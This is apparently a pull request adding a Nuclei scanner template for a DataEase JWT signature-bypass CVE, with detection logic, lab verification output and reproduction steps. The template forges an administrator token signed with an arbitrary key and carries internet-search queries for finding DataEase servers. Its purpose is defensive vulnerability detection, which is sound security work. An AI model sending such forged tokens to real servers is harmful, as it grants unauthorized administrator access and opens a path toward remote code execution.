### PR TITLE
Add CVE-2025-49001 - DataEase JWT signature verification bypass

### DIFF
--- a/http/cves/2025/CVE-2025-49001.yaml
+++ b/http/cves/2025/CVE-2025-49001.yaml
@@ -1,0 +1,50 @@
+id: CVE-2025-49001
+
+info:
+  name: DataEase <= 2.10.10 - JWT Signature Verification Bypass via Filter Chain Continuation
+  author: ChrisJr404
+  severity: critical
+  description: |
+    DataEase versions up to and including 2.10.10 contain a flaw in `CommunityTokenFilter` where a `SignatureVerificationException` thrown during HMAC validation is logged and a 401 body is written, but `filterChain.doFilter(...)` is still invoked. The downstream controller therefore executes carrying the attacker-supplied `uid` and `oid` claims because the upstream `TokenFilter` populates the user context by merely decoding the JWT without verifying its signature. An unauthenticated attacker can forge an administrator token signed with any HMAC secret. Note: this is a distinct vulnerability from CVE-2024-47073 (fixed in 2.10.2) — 2.10.2 through 2.10.10 are vulnerable to this regression.
+  impact: |
+    An unauthenticated attacker can impersonate any DataEase user, including the administrator (`uid=1`). Chained with CVE-2025-32966 (H2 JDBC RCE on the datasource validate endpoint), this becomes pre-auth remote code execution.
+  remediation: |
+    Upgrade to DataEase 2.10.11 or later, which aborts the filter chain when the JWT signature check fails.
+  reference:
+    - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-49001
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-49001
+    cwe-id: CWE-287
+    epss-score: 0.00467
+    epss-percentile: 0.64527
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dataease
+    product: dataease
+    shodan-query: http.html:"dataease"
+    fofa-query: body="dataease"
+  tags: cve,cve2025,dataease,jwt,authbypass
+
+variables:
+  payload: '{"uid":1,"oid":1,"exp":{{unix_time(86400)}}}'
+  token: '{{generate_jwt(payload,"HS256","ChrisJr404") }}'
+
+http:
+  - raw:
+      - |
+        GET /de2api/user/info HTTP/1.1
+        Host: {{Hostname}}
+        X-DE-TOKEN: {{token}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 400'
+          - 'contains(tolower(header), "de-gateway-flag")'
+          - 'contains(tolower(header), "signature")'
+          - 'contains(tolower(header), "invalid")'
+        condition: and


### PR DESCRIPTION
### Summary
Adds a verified template for **CVE-2025-49001** — a JWT signature-verification bypass in DataEase 2.10.2 through 2.10.10 (a regression of CVE-2024-47073).

`CommunityTokenFilter` catches the `SignatureVerificationException` thrown when an attacker-supplied JWT is signed with a wrong HMAC key, writes a 401 body, but **still calls `filterChain.doFilter(...)`**. The downstream controller therefore executes carrying the attacker-supplied `uid`/`oid` claims because the upstream `TokenFilter` populates the user context by merely decoding (not verifying) the JWT. An unauthenticated attacker can impersonate any user, including the administrator (`uid=1`).

This is a distinct CVE from the existing `http/cves/2024/CVE-2024-47073.yaml` template — that one returns 200 with valid data on instances ≤2.10.1; this one returns 400 with a writer-collision body on instances 2.10.2–2.10.10 because the 401 body has already been written before the controller runs.

References:
- https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
- https://nvd.nist.gov/vuln/detail/CVE-2025-49001

### Detection logic
Forge a JWT with `uid=1, oid=1, exp=+24h` signed with an arbitrary HMAC secret. Send it as `X-DE-TOKEN`. On vulnerable versions:

- Status code switches from `401` (no token / clean reject) to `400` — proof the signature check was bypassed and the controller ran.
- The response carries a `DE-Gateway-Flag` header containing the URL-encoded `\"The Token's Signature resulted invalid when verified using the Algorithm: HmacSHA256\"`. This header is unique to DataEase and only appears when the bypass succeeds.

The matcher requires all three: `status == 400`, `DE-Gateway-Flag` header present, and that header value contains both `signature` and `invalid`. The combination is unique to CVE-2025-49001 on DataEase.

### Verification
Tested on a clean Kali host using the published vulhub image.

**Vulnerable target — match:**

`vulhub/dataease:2.10.7` (from `vulhub/dataease/CVE-2025-32966/`):
```
[CVE-2025-49001] Dumped HTTP request for http://127.0.0.1:8100/de2api/user/info
GET /de2api/user/info HTTP/1.1
Host: 127.0.0.1:8100
X-DE-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

[CVE-2025-49001] Dumped HTTP response
HTTP/1.1 400
DE-Gateway-Flag: The%20Token%27s%20Signature%20resulted%20invalid%20when%20verified%20using%20the%20Algorithm%3A%20HmacSHA256
X-De-Execute-Version: 2.10.7
{\"code\":400,\"msg\":\"Request processing failed: java.lang.IllegalStateException: getWriter() has already been called for this response\",\"data\":null}

[CVE-2025-49001:dsl-1] [http] [critical] http://127.0.0.1:8100/de2api/user/info
[INF] Scan completed in 74.287707ms. 1 matches found.
```

**Negative tests:**

- The existing CVE-2024-47073 template against the same 2.10.7 instance: `No results found` (correct — 2.10.7 is patched for 47073). Confirms the two templates don't overlap.
- Baseline (no token) → 401 with `DE-Gateway-Flag: [token%20is%20empty...]`. Different status and different flag value, doesn't match.

### Reproduction
```bash
git clone https://github.com/vulhub/vulhub.git
cd vulhub/dataease/CVE-2025-32966   # this env ships 2.10.7 which is vulnerable to 49001
docker compose up -d
# wait ~45s for Spring + MySQL to come up
nuclei -t http/cves/2025/CVE-2025-49001.yaml -u http://localhost:8100
```

### Template Type / Checklist
- [x] CVE template (http/cves/2025/)
- [x] Verified (`metadata.verified: true`)
- [x] Distinct from existing CVE-2024-47073 template (different status code + header signature)
- [x] Validated with `nuclei -validate`
- [x] No real-world targets referenced
- [x] Uses `generate_jwt` helper following existing template style (CVE-2024-47073, CVE-2025-20188)